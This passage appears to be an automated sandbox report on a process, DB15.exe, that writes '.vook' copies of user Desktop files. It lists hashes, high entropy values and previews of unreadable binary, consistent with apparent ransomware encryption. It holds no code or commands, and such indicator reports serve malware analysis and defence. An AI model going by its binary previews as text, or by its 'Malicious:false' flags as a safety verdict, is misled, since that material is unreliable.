                                                                                                                                                                                                                                      SSDEEP:24:ebteRoA8hqr4b7NjqqZGhY0aYtq/Lb0+fy3JY9drIzKbnaiTkbD:OtAoMUFjhZ4Ymyk5kdM2PiD
                                                                                                                                                                                                                                      MD5:6602340C97C3A2817796A8237B9B8BA2
                                                                                                                                                                                                                                      SHA1:B89D454543B970A53EF323D72C1E6916EAA56DF2
                                                                                                                                                                                                                                      SHA-256:8D536B3D91AD4AF446913DACFBE964B8829649EA2595F043C646F4F20280EAF2
                                                                                                                                                                                                                                      SHA-512:574460CA988575B2F584A976E4C81C0559F4F452F504A9CCC5A8DBA8E5BD94A0AAD351D515906CF98C99B0477B1DA6170A33AAB75D2C560D529499FBCE4174DF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA.)..^..h.....-.{...w....U..Z.....L....y..........%.XZp..EF....cx^...z..A......pJf....."3?...3.~.D..p...D..8..Z.H...{.#.\W.....-....-...R.$.hq...r.P.q.......|"..].....]..*.Xf...3.....OU....#:.\.P..&........m.H..M.....9.....{w.$.....w..|2."...H...9#z..2.7"u....Hd..n,w.EL..-...G.[G..Y..P..v..........Z.h'....q..bH.CP..Mb....LG....3.uMv 1h.=..<...8......c.;.tY)....Y.....e..c..\.....a".-.6.mt.j..w..-m".G.n...x...p.md...x.4x...e6,.....P....u,.K.y........zg.!8..qx.+g....5........F....0.4H[]...zZd..d.4\t.......Z.j..s..j........N.*..g-;2.._.mp.@`iJ..n...Y...B.2&..i..g.R.X..\..".0.u.c....M....6H..\Ql:.)-Z[a.N.[J1.U^.G.[.cM.<..3(.-Hx.......B....?zbf..x../....3...n.....@.'o.*...K.....$H...J.q..y.V...2..a.OP..Y....w..))..F.[.?/].....DdoC..S.-..&.+.^...b....Y'....`.._+..v....v...'.."P.M,......q...f.8C.......#MO...z....U_.K..f.....i..]..`.r.I...S.X..N.}T.^....=R$.F..].|{?..D....u. <...y,..Q......;.(..r7...f.`....1h..&.x.`...9..I.I..!<...h..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\PWCCAWLGRE.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8311800868309005
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:ebteRoA8hqr4b7NjqqZGhY0aYtq/Lb0+fy3JY9drIzKbnaiTkbD:OtAoMUFjhZ4Ymyk5kdM2PiD
                                                                                                                                                                                                                                      MD5:6602340C97C3A2817796A8237B9B8BA2
                                                                                                                                                                                                                                      SHA1:B89D454543B970A53EF323D72C1E6916EAA56DF2
                                                                                                                                                                                                                                      SHA-256:8D536B3D91AD4AF446913DACFBE964B8829649EA2595F043C646F4F20280EAF2
                                                                                                                                                                                                                                      SHA-512:574460CA988575B2F584A976E4C81C0559F4F452F504A9CCC5A8DBA8E5BD94A0AAD351D515906CF98C99B0477B1DA6170A33AAB75D2C560D529499FBCE4174DF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCA.)..^..h.....-.{...w....U..Z.....L....y..........%.XZp..EF....cx^...z..A......pJf....."3?...3.~.D..p...D..8..Z.H...{.#.\W.....-....-...R.$.hq...r.P.q.......|"..].....]..*.Xf...3.....OU....#:.\.P..&........m.H..M.....9.....{w.$.....w..|2."...H...9#z..2.7"u....Hd..n,w.EL..-...G.[G..Y..P..v..........Z.h'....q..bH.CP..Mb....LG....3.uMv 1h.=..<...8......c.;.tY)....Y.....e..c..\.....a".-.6.mt.j..w..-m".G.n...x...p.md...x.4x...e6,.....P....u,.K.y........zg.!8..qx.+g....5........F....0.4H[]...zZd..d.4\t.......Z.j..s..j........N.*..g-;2.._.mp.@`iJ..n...Y...B.2&..i..g.R.X..\..".0.u.c....M....6H..\Ql:.)-Z[a.N.[J1.U^.G.[.cM.<..3(.-Hx.......B....?zbf..x../....3...n.....@.'o.*...K.....$H...J.q..y.V...2..a.OP..Y....w..))..F.[.?/].....DdoC..S.-..&.+.^...b....Y'....`.._+..v....v...'.."P.M,......q...f.8C.......#MO...z....U_.K..f.....i..]..`.r.I...S.X..N.}T.^....=R$.F..].|{?..D....u. <...y,..Q......;.(..r7...f.`....1h..&.x.`...9..I.I..!<...h..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\QNCYCDFIJJ.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.850468296418271
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:j5+1Ajkb0C98e7ty5jy2HUdxqmeVbCDZ22bzarwsURC4NR4SCXaYEtKSVf/iTkbD:j57jlte7AdR0B8bC4aar3Uc40SDTtKGV
                                                                                                                                                                                                                                      MD5:212D67D93F32E11567A313360C4C26AD
                                                                                                                                                                                                                                      SHA1:52448AC1EFB26C380A25CFEB4B46A7142EC64F98
                                                                                                                                                                                                                                      SHA-256:82CAC107D7DD7BD4805ED580A50785F36F19167B0AF99B7276761D1990A1A394
                                                                                                                                                                                                                                      SHA-512:2D4B965026024C86EBE5CEED41DB6195D1FE616868C6570125F2659613B1647FB93AA4EA9A26A70288CD2AEAC912CF7B1E8EEE8604964CE22E59534595D4A80E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYC....%.7.#t..1..N*0h.:.....n...!$.D?1.=.%..s.zo..o...m...k.;..H..bB.nH..A......+R.6!.\....:'+.!......4C(\4.z.A...UC.g.... .sJ .c8.qS...%$.-..F..R3......s..T..}...H.........r.fZ...m.nq..u..w.E..$...8...x.............Tn...;.C'.TUx..fc.>.C_..H.x=....0.......M..A......o......PN...P>/h....f&...M...J.V.......A..5B.L..+jj.7...?.]..De...j.S#.Y.Q3...|H..I$.u[c".f....../...tTkO*..5.=.d....F.........*l^.4....z....Y,......Ks'..U....LG^&!z..n.x...p..~...wlp....aY.@.n.b..>.iR5reh/..P.._.V....j\..ll.S._b...d..n^.?........Q...k...u."C1\t?j/...Zk..6}X.!GgCR......\.....N.'......P..|._N....f.....y=S...r9'..S..V..j...TX.{.].,%-.....G..........0.........K.+.. ..2R..?...Kn.k.A.....s..J.&..(.Eg...d.t2..K.a].b........]......O?.......f....0...u3...1....)]..i...u`%b..,1...B.......0.lP....?...l.~U.:5.B......R....~E..V?RD..v9..*$..H....^...Ra[.-...U....k^Jo#".x...J{l...g.?.8.oG}...J..Z.6W......}W...._...?.e9by.....R.!..HU..A.h.yZM..Z.U..(.O...W.-^4,e..V.(..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\QNCYCDFIJJ.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.850468296418271
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:j5+1Ajkb0C98e7ty5jy2HUdxqmeVbCDZ22bzarwsURC4NR4SCXaYEtKSVf/iTkbD:j57jlte7AdR0B8bC4aar3Uc40SDTtKGV
                                                                                                                                                                                                                                      MD5:212D67D93F32E11567A313360C4C26AD
                                                                                                                                                                                                                                      SHA1:52448AC1EFB26C380A25CFEB4B46A7142EC64F98
                                                                                                                                                                                                                                      SHA-256:82CAC107D7DD7BD4805ED580A50785F36F19167B0AF99B7276761D1990A1A394
                                                                                                                                                                                                                                      SHA-512:2D4B965026024C86EBE5CEED41DB6195D1FE616868C6570125F2659613B1647FB93AA4EA9A26A70288CD2AEAC912CF7B1E8EEE8604964CE22E59534595D4A80E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:QNCYC....%.7.#t..1..N*0h.:.....n...!$.D?1.=.%..s.zo..o...m...k.;..H..bB.nH..A......+R.6!.\....:'+.!......4C(\4.z.A...UC.g.... .sJ .c8.qS...%$.-..F..R3......s..T..}...H.........r.fZ...m.nq..u..w.E..$...8...x.............Tn...;.C'.TUx..fc.>.C_..H.x=....0.......M..A......o......PN...P>/h....f&...M...J.V.......A..5B.L..+jj.7...?.]..De...j.S#.Y.Q3...|H..I$.u[c".f....../...tTkO*..5.=.d....F.........*l^.4....z....Y,......Ks'..U....LG^&!z..n.x...p..~...wlp....aY.@.n.b..>.iR5reh/..P.._.V....j\..ll.S._b...d..n^.?........Q...k...u."C1\t?j/...Zk..6}X.!GgCR......\.....N.'......P..|._N....f.....y=S...r9'..S..V..j...TX.{.].,%-.....G..........0.........K.+.. ..2R..?...Kn.k.A.....s..J.&..(.Eg...d.t2..K.a].b........]......O?.......f....0...u3...1....)]..i...u`%b..,1...B.......0.lP....?...l.~U.:5.B......R....~E..V?RD..v9..*$..H....^...Ra[.-...U....k^Jo#".x...J{l...g.?.8.oG}...J..Z.6W......}W...._...?.e9by.....R.!..HU..A.h.yZM..Z.U..(.O...W.-^4,e..V.(..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851674503755424
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Ay8rHWKQpjGe0yeBegco7t4queucGitT3cOhjaoGw8Y8CG9Zv18aa1aw9U0iTkbD:OHWKQFGPBco7RQFi1k+8LzucPtiD
                                                                                                                                                                                                                                      MD5:A26D5B5EFCD4967151DF4F5650120AEF
                                                                                                                                                                                                                                      SHA1:3F77F58DE6CF50C210251A66ACD03022D10F9B63
                                                                                                                                                                                                                                      SHA-256:A0E54D09E1940049BA4F26596D5843C775E6EDD725887041272057897B46D591
                                                                                                                                                                                                                                      SHA-512:387BFE3F58EE4739DC4E83DDE2C2EF36BF9A576FEA71890C6787EAE059422176485BF79F9409FB5C68C710CD4CF0EECCE4C6931DF4F69539BE01A24B3FE62379
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.<.&yl.XCr.Z..O....H..lI..55h`...Z.p.+u?R.Y.e..$(H@...|....x.....R:....}.w1.eB.1..[.....^.h....R..@.d.h...c.a.{..$%.9.kT1.x.q...0........;..|$..T..4.*.1G.*?.<!..U5.mbT/.X.....V&..U'.F...?<.J.d.t...'P#I/.A`e.L......z...i.....d...#........_... ..F.,1-.)...z..P.1le.CM.8.....[@.j..A#..!.y.....N..G.d.bi..S._5..h....o'.n...J{.4.E3.j.#.....2...b...U.u5.L......b...%.&P2.}.i....`...l0...2..v.=..s/t.!.....$........tC(.X..bmfzZ_..a8..d.s..i..:........0..<......Pj..M..<2f...Ox..y=....s.(.c@-.].h(...!X[...z.....SO..5.3.{..Du.....t..d.........\..sT.I../|.^"|G.......A.)....o.. ...{.....6o..OD.FUh.b.Y.q.t..B..HG..UR...U...pN..J..x...I.q.O.3$...2..f.%L5...on..o../.C.g...p.c.....GX.z..mdu.&...Y..t..O.+Nk.tu.FX...z.....`&R...D.+%...I...._!.\..i8.tQ #...E...O....1y.Q..S...tv...;.j49...W.....n.IFO.....'j@.....a..i....+ME.C...U...4RX.....O.#[.-ba.....j:`..=.C.&ZD..a..g..t.p."\.WT7..`<0S5.........h.Xrh.'; ...>...Z.4...X#...3.j..t......c}X.c8..w..H..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.851674503755424
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Ay8rHWKQpjGe0yeBegco7t4queucGitT3cOhjaoGw8Y8CG9Zv18aa1aw9U0iTkbD:OHWKQFGPBco7RQFi1k+8LzucPtiD
                                                                                                                                                                                                                                      MD5:A26D5B5EFCD4967151DF4F5650120AEF
                                                                                                                                                                                                                                      SHA1:3F77F58DE6CF50C210251A66ACD03022D10F9B63
                                                                                                                                                                                                                                      SHA-256:A0E54D09E1940049BA4F26596D5843C775E6EDD725887041272057897B46D591
                                                                                                                                                                                                                                      SHA-512:387BFE3F58EE4739DC4E83DDE2C2EF36BF9A576FEA71890C6787EAE059422176485BF79F9409FB5C68C710CD4CF0EECCE4C6931DF4F69539BE01A24B3FE62379
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.<.&yl.XCr.Z..O....H..lI..55h`...Z.p.+u?R.Y.e..$(H@...|....x.....R:....}.w1.eB.1..[.....^.h....R..@.d.h...c.a.{..$%.9.kT1.x.q...0........;..|$..T..4.*.1G.*?.<!..U5.mbT/.X.....V&..U'.F...?<.J.d.t...'P#I/.A`e.L......z...i.....d...#........_... ..F.,1-.)...z..P.1le.CM.8.....[@.j..A#..!.y.....N..G.d.bi..S._5..h....o'.n...J{.4.E3.j.#.....2...b...U.u5.L......b...%.&P2.}.i....`...l0...2..v.=..s/t.!.....$........tC(.X..bmfzZ_..a8..d.s..i..:........0..<......Pj..M..<2f...Ox..y=....s.(.c@-.].h(...!X[...z.....SO..5.3.{..Du.....t..d.........\..sT.I../|.^"|G.......A.)....o.. ...{.....6o..OD.FUh.b.Y.q.t..B..HG..UR...U...pN..J..x...I.q.O.3$...2..f.%L5...on..o../.C.g...p.c.....GX.z..mdu.&...Y..t..O.+Nk.tu.FX...z.....`&R...D.+%...I...._!.\..i8.tQ #...E...O....1y.Q..S...tv...;.j49...W.....n.IFO.....'j@.....a..i....+ME.C...U...4RX.....O.#[.-ba.....j:`..=.C.&ZD..a..g..t.p."\.WT7..`<0S5.........h.Xrh.'; ...>...Z.4...X#...3.j..t......c}X.c8..w..H..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.854943827349278
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:avB5fuuGS+xizUaHhedo2JKI0j9nuI3TGqf1/rWwPT+pHlsgrTPC72YiTkbD:GB5uLS+SHD2Jwjhhy48Pq72JiD
                                                                                                                                                                                                                                      MD5:49E3F60D9F05E59EFE803F672807CE52
                                                                                                                                                                                                                                      SHA1:718ADF558F64ACDE56D3A44BAFEE67D7E87B59B7
                                                                                                                                                                                                                                      SHA-256:423CB5856E919761EEF19BE848CD639DAA5577244855FE4BFBE2BC4B3A6144B6
                                                                                                                                                                                                                                      SHA-512:7B35E7625FD8B1A3F7D89F23164451F135638F3EEA39C4F1D2D96421E8150A7F1C91107A7084C6F3F852A740B714579F0A0C05218EFC1C04F6F7D3FE31DEE32F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.m...).l.n.Yg....:...sL..i..4Q.z.O....4.3......e.L;,.*.2R..M'.....Qte..^.s.....z........}....A.....18X.e....^.....v.3........o:....t.[..w.o....~A$..kK...V...wX.@.LG.j...c..@.......O.d...v..I8...1.P.MH..z.!..u.$...Y.R|u.}.....9..I/..n...~.v...v...e..v.S........c|...EMZ. .4.[........B...`u.'4h.zzs~+..z.*....v..M5-.....,..?...Ei..;..........vQ.]kn,...>.4W.C..n.F.&..D.G./....D7.l..l."5....n.$s...:m...i....k8/....,.`u}..u.l'........W..I$......mFp..}..a.........I..:Mwhb..+m.gB.$?....:.Z.V.Z:...M"`!K...W.a.>"H!...^..x.ou.o 4.y......A.;*t.b..=.....\..O..............&..1.."......J+b./.j.....[..o.y...lHs.........b.9@.'.....Wq.7.....3S.S....&.O..@.)..21..h..A.....B.L..@L.1....?...DD.x....N)..c0.W..V..!.T...!..I...J..er.u.2..:..d......F>...P78...RC.A.....=/...gO..=..\M..;.@.]...T](y|.....+....l.....s....?.R/".%..zz+....)u.#*.cy&rZ$r..e....:.......Cm.b...b.Q.....6.l...Jy.K.-% .Z.b....i .Q...K.8.Xku.).e....%#[..wEG6......._o]...NU*..T.F.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.854943827349278
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:avB5fuuGS+xizUaHhedo2JKI0j9nuI3TGqf1/rWwPT+pHlsgrTPC72YiTkbD:GB5uLS+SHD2Jwjhhy48Pq72JiD
                                                                                                                                                                                                                                      MD5:49E3F60D9F05E59EFE803F672807CE52
                                                                                                                                                                                                                                      SHA1:718ADF558F64ACDE56D3A44BAFEE67D7E87B59B7
                                                                                                                                                                                                                                      SHA-256:423CB5856E919761EEF19BE848CD639DAA5577244855FE4BFBE2BC4B3A6144B6
                                                                                                                                                                                                                                      SHA-512:7B35E7625FD8B1A3F7D89F23164451F135638F3EEA39C4F1D2D96421E8150A7F1C91107A7084C6F3F852A740B714579F0A0C05218EFC1C04F6F7D3FE31DEE32F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.m...).l.n.Yg....:...sL..i..4Q.z.O....4.3......e.L;,.*.2R..M'.....Qte..^.s.....z........}....A.....18X.e....^.....v.3........o:....t.[..w.o....~A$..kK...V...wX.@.LG.j...c..@.......O.d...v..I8...1.P.MH..z.!..u.$...Y.R|u.}.....9..I/..n...~.v...v...e..v.S........c|...EMZ. .4.[........B...`u.'4h.zzs~+..z.*....v..M5-.....,..?...Ei..;..........vQ.]kn,...>.4W.C..n.F.&..D.G./....D7.l..l."5....n.$s...:m...i....k8/....,.`u}..u.l'........W..I$......mFp..}..a.........I..:Mwhb..+m.gB.$?....:.Z.V.Z:...M"`!K...W.a.>"H!...^..x.ou.o 4.y......A.;*t.b..=.....\..O..............&..1.."......J+b./.j.....[..o.y...lHs.........b.9@.'.....Wq.7.....3S.S....&.O..@.)..21..h..A.....B.L..@L.1....?...DD.x....N)..c0.W..V..!.T...!..I...J..er.u.2..:..d......F>...P78...RC.A.....=/...gO..=..\M..;.@.]...T](y|.....+....l.....s....?.R/".%..zz+....)u.#*.cy&rZ$r..e....:.......Cm.b...b.Q.....6.l...Jy.K.-% .Z.b....i .Q...K.8.Xku.).e....%#[..wEG6......._o]...NU*..T.F.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.85976507220566
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:I04E4Nlt9CGUZeiBjYvFtUkf5KfbKXAcVPoIlforqgygKDPyq/PZ0MxxzLDiTkbD:I04VVqewjMFWkBKfb+AkPNQrqgyTDPy+
                                                                                                                                                                                                                                      MD5:E55CFBE83B7CB24BA53B36021B9D8263
                                                                                                                                                                                                                                      SHA1:9AC390116AB27AAAC781798C510B40F2DA52779C
                                                                                                                                                                                                                                      SHA-256:4D65208C8B8234612F345846D799D837170DDC0D0BFAE17DC081F38D33F12B6E
                                                                                                                                                                                                                                      SHA-512:3C2CBA5F311EC9B9C51951E7ED44761FB0BD5FBF878538C2398EE7D54048BEF182D67EB5B28FBFE608C1F1263F5C498E18FBE2E375505002AE339AF29B807149
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS')..n.J....Q.d.".z....5..Pd.....Nb;..Z...J.E=...*..w...Hi...c.....h.^..$-.AGa.4...[P4.o..0.Z.._..Y.s......c...,.e./...>.7...Pt.Gx....yA"Ob...J....7.(...........X..{..,;...5.KQH.....<-.2./B.n.....w..k..1..j..%P.....{.1f.'[Y..X.9}..n...#.....A.T.p.-.m....z1D.......).....{Q..H.U.{.Q.O..W..D.ms/;.$:.J+...Il...x`...o.X(^...d....Sh..!N..M..--.....l...ZF..........<.b.*...,pj=7+..B............h.w....g...^...so.Mz..:n.6......B...w.(.x.H.. ..K..,..5L.5...u.W.:`.P.w&.p.n.j.......*."f._...........~.'.7P.....HQ....\..4Q7..A@..2.k..$.^......O..r.h.(..:bC.....I"..O..$...a..../s...bP.V1...t.].cs...'..f._......'KS.},$....;..0..y=u\V.Lc.;Y.`...3.m.j.....Kf.Y...f..s.UO..O..yl.]t.~.h..j..Z...d...*......i.q4.}........8..cI.~........\|.J.E.C/!.V..".rk......*.c~.).L..4............%V.b...~g.qf'9...G.>...l*.>....~<8....rpA... ."+.ri$..g-....3. <.:.El~....o.L...Z.d.0B.I.JA.......&.>v.[[gGx.[].Cz..<.%...R..kgv.q...g.<..q"...7...i..s>....}.!*f.(........`

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.85976507220566
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:I04E4Nlt9CGUZeiBjYvFtUkf5KfbKXAcVPoIlforqgygKDPyq/PZ0MxxzLDiTkbD:I04VVqewjMFWkBKfb+AkPNQrqgyTDPy+
                                                                                                                                                                                                                                      MD5:E55CFBE83B7CB24BA53B36021B9D8263
                                                                                                                                                                                                                                      SHA1:9AC390116AB27AAAC781798C510B40F2DA52779C
                                                                                                                                                                                                                                      SHA-256:4D65208C8B8234612F345846D799D837170DDC0D0BFAE17DC081F38D33F12B6E
                                                                                                                                                                                                                                      SHA-512:3C2CBA5F311EC9B9C51951E7ED44761FB0BD5FBF878538C2398EE7D54048BEF182D67EB5B28FBFE608C1F1263F5C498E18FBE2E375505002AE339AF29B807149
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS')..n.J....Q.d.".z....5..Pd.....Nb;..Z...J.E=...*..w...Hi...c.....h.^..$-.AGa.4...[P4.o..0.Z.._..Y.s......c...,.e./...>.7...Pt.Gx....yA"Ob...J....7.(...........X..{..,;...5.KQH.....<-.2./B.n.....w..k..1..j..%P.....{.1f.'[Y..X.9}..n...#.....A.T.p.-.m....z1D.......).....{Q..H.U.{.Q.O..W..D.ms/;.$:.J+...Il...x`...o.X(^...d....Sh..!N..M..--.....l...ZF..........<.b.*...,pj=7+..B............h.w....g...^...so.Mz..:n.6......B...w.(.x.H.. ..K..,..5L.5...u.W.:`.P.w&.p.n.j.......*."f._...........~.'.7P.....HQ....\..4Q7..A@..2.k..$.^......O..r.h.(..:bC.....I"..O..$...a..../s...bP.V1...t.].cs...'..f._......'KS.},$....;..0..y=u\V.Lc.;Y.`...3.m.j.....Kf.Y...f..s.UO..O..yl.]t.~.h..j..Z...d...*......i.q4.}........8..cI.~........\|.J.E.C/!.V..".rk......*.c~.).L..4............%V.b...~g.qf'9...G.>...l*.>....~<8....rpA... ."+.ri$..g-....3. <.:.El~....o.L...Z.d.0B.I.JA.......&.>v.[[gGx.[].Cz..<.%...R..kgv.q...g.<..q"...7...i..s>....}.!*f.(........`

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\EOWRVPQCCS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.857195426000713
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:S0qBhhJTqTqk8iLweK+UJExsYYOOHUNUxeoqjjdMtXhDJpriVVJ9MH1vuxq3hjxF:SRBY8iLwoUyqYMGUjQjytnprC5iYieCn
                                                                                                                                                                                                                                      MD5:61F6633F9EFA5D43C1E98975CF40D488
                                                                                                                                                                                                                                      SHA1:6C1EE7D20C85035AFE9024F23FE051DF7DCA3442
                                                                                                                                                                                                                                      SHA-256:25F2748DFFBDB199433D0DC1CBBAC24E5883C1204ADDEBDF6EC8FF7417904578
                                                                                                                                                                                                                                      SHA-512:78C02A5F66A3BCC8A459EE552F6FCBC1E0293471E4BB25B46F32F4A672B99F530D6FF92772A09E0F81625E994994F7194C42FDFA9718C05F94A0044B96861EC6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:EOWRV..dC4.t=...\....kl>.e..(.S.(T?...h.`.. ....{....BW....M..1.C..X.=.G..v sCh...{g.C..j.w<..C.;.E8.XX<)p.XPZ.L.h....^.E....k.1...Zk^.......^,..^..Kj...-R.oz..d...?...w.v........Pa.L4...dOo7...3d..F+./..jm...s.~...!X....9.}....{..%.. .+.#.]l~...Y.\....>_.^.k.6...;*>t=.Fx...F...E...iE+...w...G.e[..FcD..|V...Hv0..m.+:....N................r.4....`%.4b........h:..A.....}.9_. Z.y2..0nV...@}.5.. :w.;!.."....n.H\.Wi.2.....EeOs.K(...c.U...3.M.).....CP..]........C.,...@V..0E~".q{......4N...Amjb......*z..R.l..H.^z1....."...6s...(...F.....C...F.\...]UH...x....mI..=F6-.^&Rw#.w.^..x..l\..!..Z....\...W"$.e.@0......4..}.v..S...Dh../z..cF.P.8.[..(.......braI...gc.^Vb=..'...Q.bN.j.4.T..G..TF.sM.b..F'.{M.d.....X.7..k..........%...n...'..k.5..m...W..o..:5h..f..c.U./...y....pN].r&.,-..4...F..a.H.2K..m?..J..=...b..........S..4X]......m.......2Wi.{..`(.........[W..?I.{..]....H!2.D..ID3\Z..P.9..e.........`.G...].o..............Y....h.t..i>..=p.....j..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SFPUSAFIOL\EOWRVPQCCS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.857195426000713
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:S0qBhhJTqTqk8iLweK+UJExsYYOOHUNUxeoqjjdMtXhDJpriVVJ9MH1vuxq3hjxF:SRBY8iLwoUyqYMGUjQjytnprC5iYieCn
                                                                                                                                                                                                                                      MD5:61F6633F9EFA5D43C1E98975CF40D488
                                                                                                                                                                                                                                      SHA1:6C1EE7D20C85035AFE9024F23FE051DF7DCA3442
                                                                                                                                                                                                                                      SHA-256:25F2748DFFBDB199433D0DC1CBBAC24E5883C1204ADDEBDF6EC8FF7417904578
                                                                                                                                                                                                                                      SHA-512:78C02A5F66A3BCC8A459EE552F6FCBC1E0293471E4BB25B46F32F4A672B99F530D6FF92772A09E0F81625E994994F7194C42FDFA9718C05F94A0044B96861EC6
                                                                                                                                                                                                                                      Malicious:false
